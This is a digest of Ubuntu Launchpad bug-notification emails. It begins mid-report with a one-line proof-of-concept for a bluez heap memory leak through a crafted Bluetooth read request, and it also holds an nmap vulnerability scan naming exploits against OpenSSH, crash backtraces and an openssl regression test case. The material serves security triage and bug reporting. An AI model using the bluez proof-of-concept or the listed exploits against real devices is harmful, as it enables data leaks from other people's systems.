  The message content is the buffer pointed to by value, which can be most 
addresses on the heap

  poc is very simple, the core is this line of code

  memcpy([0],"\x0c\x0b\x00\x0d\x00",5);

  0xc stands for read
  \x0b\x00 represents the handle of the client feature, which can be obtained 
through the find info message, which seems to be 0b by default
  \x0d\x00 is offset0xd

  
  this vulnerability is serious
  I want to apply for a cve number, although this has been silently fixed in 
the latest version

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/bluez/+bug/1926548/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1930286] Re: Defensics' synopsys fuzzer testing tool cause openssh to segfault

2021-06-02 Thread Seth Arnold
Hello Eric, thanks for doing the research on this issue.

Does the coredump look like this may be exploitable in some fashion?

Is the crash something that affects anything beyond the specific process
serving the client in question?

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1930286

Title:
  Defensics' synopsys fuzzer testing tool cause openssh to segfault

Status in openssh package in Ubuntu:
  New
Status in openssh source package in Xenial:
  New

Bug description:
  Here's what has been brought to my attention by a UA customer:

  * Release:
  Xenial/16.04LTS

  * Openssh version:
  7.2p2-4ubuntu2.10

  * Fuzzer tool used:
  
https://www.synopsys.com/software-integrity/security-testing/fuzz-testing.html 
(proprietary software)

  As of today, I have no access to a reproducer. Still working on
  getting access to one (if possible) in order to better understand what
  the failing test scenario is doing.

  * coredump:

  $ gdb $(which sshd) core.cic-1.domain.tld.1612566260.sshd.20731
  ...
  Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
  Core was generated by `sshd: [net] '.
  Program terminated with signal SIGSEGV, Segmentation fault.
  #0 __memcpy_avx_unaligned () at 
../sysdeps/x86_64/multiarch/memcpy-avx-unaligned.S:136
  136 ../sysdeps/x86_64/multiarch/memcpy-avx-unaligned.S: No such file or 
directory.
  (gdb) bt
  #0 __memcpy_avx_unaligned () at 
../sysdeps/x86_64/multiarch/memcpy-avx-unaligned.S:136
  #1 0x7fec25b241db in memcpy (__len=, __src=0x0, 
__dest=)
  at /usr/include/x86_64-linux-gnu/bits/string3.h:53
  #2 aes_gcm_ctrl (c=0x558a7ae19758, type=, arg=, 
ptr=0x0) at e_aes.c:1189
  #3 0x7fec25b20897 in EVP_CIPHER_CTX_ctrl (ctx=ctx@entry=0x558a7ae19758, 
type=type@entry=18, arg=arg@entry=-1, ptr=ptr@entry=0x0) at evp_enc.c:619
  #4 0x558a7953f54c in cipher_init (cc=cc@entry=0x558a7ae19750, 
cipher=0x558a797b3ef0 , key=0x0, keylen=32, iv=0x0, 
ivlen=, do_encrypt=0) at ../cipher.c:336
  #5 0x558a7954521a in ssh_set_newkeys (ssh=ssh@entry=0x558a7ae18ef0, 
mode=mode@entry=0)at ../packet.c:919
  #6 0x558a7955ae92 in kex_input_newkeys (type=, 
seq=, ctxt=0x558a7ae18ef0)at ../kex.c:434
  #7 0x558a7954d269 in ssh_dispatch_run (ssh=ssh@entry=0x558a7ae18ef0, 
mode=0, done=0x558a7ae18278, ctxt=0x558a7ae18ef0) at ../dispatch.c:119
  #8 0x558a7954d2b9 in ssh_dispatch_run_fatal (ssh=0x558a7ae18ef0, 
mode=, done=, ctxt=) at 
../dispatch.c:140
  #9 0x558a79502770 in do_ssh2_kex () at ../sshd.c:2744
  #10 main (ac=, av=) at ../sshd.c:2301
  (gdb)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1930286/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1930301] Re: package libpam0g:amd64 1.3.1-5ubuntu4.2 failed to install/upgrade: installed libpam0g:amd64 package post-installation script subprocess returned error exit status 1

2021-06-01 Thread Seth Arnold
** Also affects: debconf (Ubuntu)
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to pam in Ubuntu.
https://bugs.launchpad.net/bugs/1930301

Title:
  package libpam0g:amd64 1.3.1-5ubuntu4.2 failed to install/upgrade:
  installed libpam0g:amd64 package post-installation script subprocess
  returned error exit status 1

Status in debconf package in Ubuntu:
  New
Status in pam package in Ubuntu:
  New

Bug description:
  My laptop system continuously pops the message system crashed

  ProblemType: Package
  DistroRelease: Ubuntu 20.04
  Package: libpam0g:amd64 1.3.1-5ubuntu4.2
  ProcVersionSignature: Ubuntu 5.8.0-53.60~20.04.1-generic 5.8.18
  Uname: Linux 5.8.0-53-generic x86_64
  ApportVersion: 2.20.11-0ubuntu27.18
  Architecture: amd64
  CasperMD5CheckResult: skip
  Date: Mon May 31 22:05:36 2021
  DuplicateSignature:
   package:libpam0g:amd64:1.3.1-5ubuntu4.2
   Setting up libpam0g:amd64 (1.3.1-5ubuntu4.2) ...
   debconf: DbDriver "config": /var/cache/debconf/config.dat is locked by 
another process: Resource temporarily unavailable
   dpkg: error processing package libpam0g:amd64 (--configure):
installed libpam0g:amd64 package post-installation script subprocess 
returned error exit status 1
  ErrorMessage: installed libpam0g:amd64 package post-installation script 
subprocess returned error exit status 1
  InstallationDate: Installed on 2020-08-08 (296 days ago)
  InstallationMedia: Ubuntu 20.04.1 LTS "Focal Fossa" - Release amd64 (20200731)
  Python3Details: /usr/bin/python3.8, Python 3.8.5, python3-minimal, 
3.8.2-0ubuntu2
  PythonDetails: /usr/bin/python2.7, Python 2.7.18, python-is-python2, 2.7.17-4
  RelatedPackageVersions:
   dpkg 1.19.7ubuntu3
   apt  2.0.4
  SourcePackage: pam
  Title: package libpam0g:amd64 1.3.1-5ubuntu4.2 failed to install/upgrade: 
installed libpam0g:amd64 package post-installation script subprocess returned 
error exit status 1
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/debconf/+bug/1930301/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1930209] Re: Could not open file /var/lib/update-notifier/package-data- downloads/partial/verdan32.exe - open (40: Too many levels of symbolic links)

2021-06-01 Thread Seth Arnold
** Summary changed:

- sudo apt install timeshift Reading package lists... Done Building dependency 
treeReading state information... Done The following NEW packages will 
be installed:   timeshift 0 upgraded, 1 newly installed, 0 to remove and 0 not 
upgraded. 1 not fully installed or removed. Need to get 640 kB of archives. 
After this operation, 3,323 kB of additional disk space will be used. Get:1 
http://np.archive.ubuntu.com/ubuntu focal/universe amd64 timeshift amd64 
20.03+ds-2 [640 kB] Fetched 640 kB in 6s (115 kB/s) 
  Selecting previously unselected package timeshift. (Reading database ... 
191451 files and directories currently installed.) Preparing to unpack 
.../timeshift_20.03+ds-2_amd64.deb ... Unpacking timeshift (20.03+ds-2) ... 
Setting up timeshift (20.03+ds-2) ... Setting up update-notifier-common 
(3.192.30.7) ... ttf-mscorefonts-installer: processing... 
ttf-mscorefonts-installer: downloading 
http://downloads.sourceforge.net/corefont s/andale32.exe 
/usr/lib/update-notifier/package-data-downloader:185: DeprecationWarning: 
apt_pk g.sha256sum is deprecated, use apt_pkg.Hashes   real_sha256 = 
apt_pkg.sha256sum(dest_file_obj) ttf-mscorefonts-installer: downloading 
http://downloads.sourceforge.net/corefont s/arial32.exe 
ttf-mscorefonts-installer: downloading 
http://downloads.sourceforge.net/corefont s/arialb32.exe 
ttf-mscorefonts-installer: downloading 
http://downloads.sourceforge.net/corefont s/comic32.exe 
ttf-mscorefonts-installer: downloading 
http://downloads.sourceforge.net/corefont s/courie32.exe 
ttf-mscorefonts-installer: downloading 
http://downloads.sourceforge.net/corefont s/georgi32.exe Get:1 
http://downloads.sourceforge.net/corefonts/georgi32.exe [392 kB] Fetched 392 kB 
in 8s (46.6 kB/s)
ttf-mscorefonts-installer: downloading 
http://downloads.sourceforge.net/corefont s/impact32.exe Get:1 
http://downloads.sourceforge.net/corefonts/impact32.exe [173 kB] Fetched 173 kB 
in 20s (8,707 B/s)   
ttf-mscorefonts-installer: downloading 
http://downloads.sourceforge.net/corefont s/times32.exe Get:1 
http://downloads.sourceforge.net/corefonts/times32.exe [662 kB] Fetched 662 kB 
in 35s (19.1 kB/s)   
ttf-mscorefonts-installer: downloading 
http://downloads.sourceforge.net/corefont s/trebuc32.exe Get:1 
http://downloads.sourceforge.net/corefonts/trebuc32.exe [357 kB] Fetched 357 kB 
in 21s (16.8 kB/s)   
ttf-mscorefonts-installer: downloading 
http://downloads.sourceforge.net/corefont s/verdan32.exe Err:1 
http://downloads.sourceforge.net/corefonts/verdan32.exe   Could not open file 
/var/lib/update-notifier/package-data-downloads/partial/ve rdan32.exe - open 
(40: Too many levels of symbolic links) [IP: 203.135.147.10 44 3] E: Failed to 
fetch https://udomain.dl.sourceforge.net/project/corefonts/the font 
s/final/verdan32.exe  Could not open file 
/var/lib/update-notifier/package-data- downloads/partial/verdan32.exe - open 
(40: Too many levels of symbolic links) [I P: 203.135.147.10 443] E: Download 
Failed Processing triggers for desktop-file-utils (0.24-1ubuntu3) ... 
Processing triggers for mime-support (3.64ubuntu1) ... Processing triggers for 
hicolor-icon-theme (0.17-2) ... Processing triggers for gnome-menus 
(3.36.0-1ubuntu1) ... Processing triggers for man-db (2.9.1-1) ...
+ Could not open file /var/lib/update-notifier/package-data- 
downloads/partial/verdan32.exe - open (40: Too many levels of symbolic links)

** Description changed:

  app  installation is not properly fixed
  files arenot properly installed and it gives alot of error
+ 
+ === from title ===
+ sudo apt install timeshift Reading package lists... Done Building dependency 
treeReading state information... Done The following NEW packages will 
be installed:   timeshift 0 upgraded, 1 newly installed, 0 to remove and 0 not 
upgraded. 1 not fully installed or removed. Need to get 640 kB of archives. 
After this operation, 3,323 kB of additional disk space will be used. Get:1 
http://np.archive.ubuntu.com/ubuntu focal/universe amd64 timeshift amd64 
20.03+ds-2 [640 kB] Fetched 640 kB in 6s (115 kB/s) 
  Selecting previously unselected package timeshift. (Reading database ... 
191451 files and directories currently installed.) Preparing to unpack 
.../timeshift_20.03+ds-2_amd64.deb ... Unpacking timeshift (20.03+ds-2) ... 
Setting up timeshift (20.03+ds-2) ... Setting up update-notifier-common 
(3.192.30.7) ... ttf-mscorefonts-installer: processing... 
ttf-mscorefonts-installer: downloading 
http://downloads.sourceforge.net/corefont s/andale32.exe 
/usr/lib/update-notifier/package-data-downloader:185: DeprecationWarning: 
apt_pk g.sha256sum is deprecated, use apt_pkg.Hashes   real_sha256 = 
apt_pkg.sha256sum(dest_file_obj) 

[Touch-packages] [Bug 1930103] Re: isc-dhcp-server overwrites /etc/default/isc-dhcp-server during update

2021-05-28 Thread Seth Arnold
Hello Milan, I just tested an upgrade:

Unpacking isc-dhcp-server (4.4.1-2.1ubuntu5.20.04.2) over
(4.4.1-2.1ubuntu5) ...

and my /etc/default/isc-dhcp-server modifications had been left in
place.

The maintainer scripts will create a new one if the file cannot be read:
https://sources.debian.org/src/isc-dhcp/4.4.1-2.2/debian/isc-dhcp-server.postinst/#L33

(Debian sources, but Ubuntu's are very similar.)

Is it possible your old /etc/default/isc-dhcp-server could not be read?

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to isc-dhcp in Ubuntu.
https://bugs.launchpad.net/bugs/1930103

Title:
  isc-dhcp-server overwrites /etc/default/isc-dhcp-server during update

Status in isc-dhcp package in Ubuntu:
  New

Bug description:
  Today unattended upgrade of ISC DHCPD overwrite config file
  /etc/default/isc-dhcp-server and set wrong interface where daemon have
  to listen (eno2 instead of br0 as was set before update).

  I see no backup file of original config file so I had to investigate
  where the problem was.

  Update have to never overwrite config file and throw away previous
  version.

  /var/log/apt/history.log:
  Start-Date: 2021-05-28  06:17:41
  Commandline: /usr/bin/unattended-upgrade
  Upgrade: isc-dhcp-server:amd64 (4.4.1-2.1ubuntu5, 4.4.1-2.1ubuntu5.20.04.2)
  End-Date: 2021-05-28  06:17:47

  root@linux:~# ls -l /etc/default/isc-dhcp-server
  -rw-r--r-- 1 root root 629 May 28 06:17 /etc/default/isc-dhcp-server

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/isc-dhcp/+bug/1930103/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1929758] Re: OpenSSH vulnerabilities

2021-05-28 Thread Seth Arnold
Great, thanks Ian.

** Package changed: ubuntu => openssh (Ubuntu)

** Changed in: openssh (Ubuntu)
   Status: Incomplete => Invalid

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1929758

Title:
  OpenSSH vulnerabilities

Status in openssh package in Ubuntu:
  Invalid

Bug description:
  Hi,

  I was using NMAP to scan my Ubuntu server and it listed some
  vulnerabilities in OpenSSH. It also came up with exploits against
  these vulnerabilities.

  On my home network, I have several computers that I use for various
  purposes; a Ubuntu 20.04 LTS computer and Kali Linux computer being
  the subject for this email. I wanted to test if I had any security
  issues on my Ubuntu computer so I was doing some scans on it from my
  Kali computer. I did a scan with NMAP and it produced some
  vulnerabilities in OpenSSH and what exploits to use. Here is some info
  on my computers and the NMAP command that I used:

  ~$ lsb_release -a
  No LSB modules are available.
  Distributor ID:   Ubuntu
  Description:  Ubuntu 20.04.2 LTS
  Release:  20.04
  Codename: focal

  ─$ lsb_release -a
  No LSB modules are available.
  Distributor ID:   Kali
  Description:  Kali GNU/Linux Rolling
  Release:  2021.1
  Codename: kali-rolling

  ~$ ssh -V
  OpenSSH_8.2p1 Ubuntu-4ubuntu0.2, OpenSSL 1.1.1f  31 Mar 2020

  ~$ apt-cache policy ssh
  ssh:
Installed: (none)
Candidate: 1:8.2p1-4ubuntu0.2
Version table:
   1:8.2p1-4ubuntu0.2 500
  500 http://ca.archive.ubuntu.com/ubuntu focal-updates/main amd64 
Packages
  500 http://ca.archive.ubuntu.com/ubuntu focal-security/main amd64 
Packages
   1:8.2p1-4 500
  500 http://ca.archive.ubuntu.com/ubuntu focal/main amd64 Packages

  
  ─$ sudo nmap -sV --script vuln 192.168.0.10
  Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-26 17:26 PDT
  Pre-scan script results:
  | broadcast-avahi-dos: 
  |   Discovered hosts:
  | 224.0.0.251
  |   After NULL UDP avahi packet DoS (CVE-2011-1002).
  |_  Hosts are all up (not vulnerable).
  Nmap scan report for 192.168.0.10
  Host is up (0.00017s latency).
  Not shown: 995 filtered ports
  PORTSTATE  SERVICE  VERSION
  20/tcp  closed ftp-data
  21/tcp  closed ftp
  22/tcp  open   ssh  OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; 
protocol 2.0)
  | vulners: 
  |   cpe:/a:openbsd:openssh:8.2p1: 
  | EDB-ID:2101810.0
https://vulners.com/exploitdb/EDB-ID:21018  *EXPLOIT*
  | CVE-2001-0554   10.0https://vulners.com/cve/CVE-2001-0554
  | CVE-2020-15778  6.8 https://vulners.com/cve/CVE-2020-15778
  | CVE-2020-12062  5.0 https://vulners.com/cve/CVE-2020-12062
  | CVE-2021-28041  4.6 https://vulners.com/cve/CVE-2021-28041
  | MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/ 4.3 
https://vulners.com/metasploit/MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/  
*EXPLOIT*
  | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/  4.3 
https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/
   *EXPLOIT*
  | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/  4.3 
https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/
   *EXPLOIT*
  | MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/  4.3 
https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/
   *EXPLOIT*
  | MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/   4.3 
https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/
*EXPLOIT*
  | CVE-2020-14145  4.3 https://vulners.com/cve/CVE-2020-14145
  |_MSF:AUXILIARY/SCANNER/SSH/FORTINET_BACKDOOR/0.0 
https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/SSH/FORTINET_BACKDOOR/ 
*EXPLOIT*
  80/tcp  open   http Apache httpd
  |_http-csrf: Couldn't find any CSRF vulnerabilities.
  |_http-dombased-xss: Couldn't find any DOM based XSS.
  |_http-server-header: Apache
  |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
  443/tcp open   ssl/http Apache httpd
  |_http-csrf: Couldn't find any CSRF vulnerabilities.
  |_http-dombased-xss: Couldn't find any DOM based XSS.
  |_http-server-header: Apache
  |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
  |_sslv2-drown: 
  MAC Address: 00:15:C5:F6:5D:94 (Dell)
  Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

  Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 80.86 seconds

  Thanks,
  Ian

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1929758/+subscriptions

-- 

[Touch-packages] [Bug 1152187] Re: [MIR] systemd

2021-05-25 Thread Seth Arnold
The usual way we determine if a package is in main or not is to check
the package lists; will the promotion step make the systemd-container
binary package visible to package lists or rmadison output?

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to systemd in Ubuntu.
https://bugs.launchpad.net/bugs/1152187

Title:
  [MIR] systemd

Status in systemd package in Ubuntu:
  Fix Released
Status in systemd source package in Bionic:
  Incomplete

Bug description:
  * The package is in universe and built on all archs:
  https://launchpad.net/ubuntu/+source/systemd/44-10ubuntu1

  * Rationale:

  - in a first step we want systemd-services promoted to replace ubuntu-
  system-services

  -  We will also want to move from consolekit to logind soon
  (https://blueprints.launchpad.net/ubuntu/+spec/foundations-1303
  -consolekit-logind-migration)

  - udev has been merged in the systemd source upstream so we will want
  to build it from there at some point as well

  we don't plan to use the systemd init system at this point

  * Security:

  there has been some security issues in the past
  http://secunia.com/advisories/search/?search=systemd
  http://secunia.com/advisories/48220/
  http://secunia.com/advisories/48208/
  http://secunia.com/advisories/48331/

  Those are mostly logind issue and have been fixed upstream.

  Our current package is outdated but we do plan to update it before
  starting using logind. There should be no issue with the services

  * Quality:
  - there is no RC bug in debian: 
http://bugs.debian.org/cgi-bin/pkgreport.cgi?repeatmerged=no=systemd
  - there is no bug open in launchpad: 
https://launchpad.net/ubuntu/+source/systemd/+bugs
  - upstream is active and responsive to issues

  The desktop bugs team is subscribed to the package in launchpad,
  foundations/desktop will maintain the package and look to the bug
  reports regularly.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1152187/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1928360] Re: Switch to Fcitx 5 for Chinese

2021-05-24 Thread Seth Arnold
Gunnar, indeed, it had much less in it than I expected; I don't know
much about the snap packaging for Chromium, but it looked to me like it
was trying to do bluetooth things and that's all that was denied.

I'm no fcitx expert but I didn't think it looked related.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1928360

Title:
  Switch to Fcitx 5 for Chinese

Status in Lubuntu default settings:
  New
Status in Ubuntu Kylin:
  In Progress
Status in apparmor package in Ubuntu:
  New
Status in language-selector package in Ubuntu:
  Fix Released

Bug description:
  In Debian 11 Fcitx 5 will be the default IM framework for Chinese on
  non-GNOME desktops. I can think it's time to make the equivalent
  changes in Ubuntu 21.10 as well.

  I'd appreciate input on the topic from the Ubuntu Kylin team as well
  as other Chinese speaking users.

To manage notifications about this bug go to:
https://bugs.launchpad.net/lubuntu-default-settings/+bug/1928360/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


Re: [Touch-packages] [apparmor] [Bug 1928360] Re: Switch to Fcitx 5 for Chinese

2021-05-18 Thread Seth Arnold
On Tue, May 18, 2021 at 07:39:48PM -, Gunnar Hjalmarsson wrote:
> On 2021-05-16 22:23, Gunnar Hjalmarsson wrote:
> > As regards apparmor it's possible that no change is needed.
> 
> Well, I simply tested with the Chromium snap. fcitx5 does not work in
> Chromium, while fcitx4 does. So something needs to be done.

Excellent, can you paste the DENIED lines from your test into the bug
report?

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1928360

Title:
  Switch to Fcitx 5 for Chinese

Status in Lubuntu default settings:
  New
Status in Ubuntu Kylin:
  New
Status in apparmor package in Ubuntu:
  New
Status in language-selector package in Ubuntu:
  In Progress

Bug description:
  In Debian 11 Fcitx 5 will be the default IM framework for Chinese on
  non-GNOME desktops. I can think it's time to make the equivalent
  changes in Ubuntu 21.10 as well.

  I'd appreciate input on the topic from the Ubuntu Kylin team as well
  as other Chinese speaking users.

To manage notifications about this bug go to:
https://bugs.launchpad.net/lubuntu-default-settings/+bug/1928360/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1873627] Re: auditd fails after moving /var it a new filesystem and turning /var/run into a symlink to /run

2021-05-13 Thread Seth Arnold
Thanks for the strace, these looked like the 'important' parts:

sendto(3, {{len=56, type=AUDIT_SET, flags=NLM_F_REQUEST|NLM_F_ACK, seq=3, 
pid=0}, 
"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa2\xb8\x29\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"...},
 56, 0, {sa_family=AF_NETLINK, nl_pid=0, nl_groups=}, 12) = 56
poll([{fd=3, events=POLLIN}], 1, 500)   = 1 ([{fd=3, revents=POLLIN}])
recvfrom(3, {{len=76, type=NLMSG_ERROR, flags=0, seq=3, pid=2734242}, 
{error=-EEXIST, msg={{len=56, type=AUDIT_SET, flags=NLM_F_REQUEST|NLM_F_ACK, 
seq=3, pid=0}, 
"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa2\xb8\x29\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"...}}},
 8988, MSG_PEEK|MSG_DONTWAIT, {sa_family=AF_NETLINK, nl_pid=0, 
nl_groups=}, [12]) = 76
recvfrom(3, {{len=76, type=NLMSG_ERROR, flags=0, seq=3, pid=2734242}, 
{error=-EEXIST, msg={{len=56, type=AUDIT_SET, flags=NLM_F_REQUEST|NLM_F_ACK, 
seq=3, pid=0}, 
"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa2\xb8\x29\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"...}}},
 8988, MSG_DONTWAIT, {sa_family=AF_NETLINK, nl_pid=0, nl_groups=}, 
[12]) = 76
write(2, "Error setting audit daemon pid ("..., 44Error setting audit daemon 
pid (File exists)) = 44

...

write(2, "The audit daemon is exiting.", 28The audit daemon is exiting.) = 28
write(2, "\n", 1
)   = 1
sendto(3, {{len=56, type=AUDIT_SET, flags=NLM_F_REQUEST|NLM_F_ACK, seq=4, 
pid=0}, 
"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"...},
 56, 0, {sa_family=AF_NETLINK, nl_pid=0, nl_groups=}, 12) = 56
poll([{fd=3, events=POLLIN}], 1, 500)   = 1 ([{fd=3, revents=POLLIN}])
recvfrom(3, {{len=76, type=NLMSG_ERROR, flags=0, seq=4, pid=2734242}, 
{error=-EACCES, msg={{len=56, type=AUDIT_SET, flags=NLM_F_REQUEST|NLM_F_ACK, 
seq=4, pid=0}, 
"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"...}}},
 8988, MSG_PEEK|MSG_DONTWAIT, {sa_family=AF_NETLINK, nl_pid=0, 
nl_groups=}, [12]) = 76
recvfrom(3, {{len=76, type=NLMSG_ERROR, flags=0, seq=4, pid=2734242}, 
{error=-EACCES, msg={{len=56, type=AUDIT_SET, flags=NLM_F_REQUEST|NLM_F_ACK, 
seq=4, pid=0}, 
"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"...}}},
 8988, MSG_DONTWAIT, {sa_family=AF_NETLINK, nl_pid=0, nl_groups=}, 
[12]) = 76
write(2, "Error setting audit daemon pid ("..., 50Error setting audit daemon 
pid (Permission denied)) = 50
write(2, "\n", 1
)   = 1

I don't understand why it's issuing an AUDIT_SET command after it
already decided to exit -- maybe it's just trying to tear itself down
cleanly.


I found a few cases in the kernel code for returning both file exists and 
permission denied:

kernel/audit.c audit_netlink_ok():

/* Only support auditd and auditctl in initial pid namespace
 * for now. */
if (task_active_pid_ns(current) != _pid_ns)
return -EPERM;

if (!netlink_capable(skb, CAP_AUDIT_CONTROL))
err = -EPERM;
break;


kernel/audit.c audit_receive_msg():

auditd_pid = auditd_pid_vnr();
if (auditd_pid) {
/* replacing a healthy auditd is not allowed */
if (new_pid) {
audit_log_config_change("audit_pid",
new_pid, auditd_pid, 0);
return -EEXIST;
}


kernel/audit.c audit_set_feature():

   /* are we changing a locked feature? */
if (old_lock && (new_feature != old_feature)) {
audit_log_feature_change(i, old_feature, new_feature,
 old_lock, new_lock, 0);
return -EPERM;
}


Do any of these feel applicable to your environment?

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to audit in Ubuntu.
https://bugs.launchpad.net/bugs/1873627

Title:
  auditd fails after moving /var it a new filesystem and turning
  /var/run into a symlink to /run

Status in audit package in Ubuntu:
  Confirmed

Bug description:
  Auditd was working on my system (Ubuntu 18.04LTS, kernel
  4.15.0-1065-aws) until recently. But after splitting off /var into a
  new filesystem it fails to launch.

  running '/sbin/auditd -f' as root indicates a problem writing the pid file 
(no file exists even when it says one does) Post config load command output: 
  Started dispatcher: 

[Touch-packages] [Bug 1926254] Re: x509 Certificate verification fails when basicConstraints=CA:FALSE, pathlen:0 on self-signed leaf certs

2021-05-03 Thread Seth Arnold
Matthew, thanks so much! sounds good to me.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1926254

Title:
  x509 Certificate verification fails when
  basicConstraints=CA:FALSE,pathlen:0 on self-signed leaf certs

Status in openssl package in Ubuntu:
  Fix Released
Status in openssl source package in Focal:
  In Progress
Status in openssl source package in Groovy:
  In Progress
Status in openssl source package in Hirsute:
  Fix Released

Bug description:
  [Impact]

  In openssl 1.1.1f, the below commit was merged:

  commit ba4356ae4002a04e28642da60c551877eea804f7
  Author: Bernd Edlinger 
  Date:   Sat Jan 4 15:54:53 2020 +0100
  Subject: Fix error handling in x509v3_cache_extensions and related functions
  Link: 
https://github.com/openssl/openssl/commit/ba4356ae4002a04e28642da60c551877eea804f7

  This introduced a regression which caused certificate validation to
  fail when certificates violate RFC 5280 [1], namely, when a
  certificate has "basicConstraints=CA:FALSE,pathlen:0". This
  combination is commonly seen by self-signed leaf certificates with an
  intermediate CA before the root CA.

  Because of this, openssl 1.1.1f rejects these certificates and they
  cannot be used in the system certificate store, and ssl connections
  fail when you try to use them to connect to a ssl endpoint.

  The error you see when you try verify is:

  $ openssl verify -CAfile CA/rootCA_cert.pem -untrusted CA/subCA_cert.pem 
user1_cert.pem
  error 20 at 0 depth lookup: unable to get local issuer certificate
  error user1_cert.pem: verification failed

  The exact same certificates work fine on Xenial, Bionic and Hirsute.

  [1] https://tools.ietf.org/html/rfc5280.html

  [Testcase]

  We will create our own root CA, intermediate CA and leaf server
  certificate.

  Create necessary directories:

  $ mkdir reproducer
  $ cd reproducer
  $ mkdir CA

  Write openssl configuration files to disk for each CA and cert:

  $ cat << EOF >> rootCA.cnf
  [ req ]
  prompt  = no
  distinguished_name  = req_distinguished_name
  x509_extensions = usr_cert

  [ req_distinguished_name ]
  C  = DE
  O  = Test Org
  CN = Test RSA PSS Root-CA

  [ usr_cert ]
  basicConstraints= critical,CA:TRUE
  keyUsage= critical,keyCertSign,cRLSign
  subjectKeyIdentifier= hash
  authorityKeyIdentifier  = keyid:always
  EOF

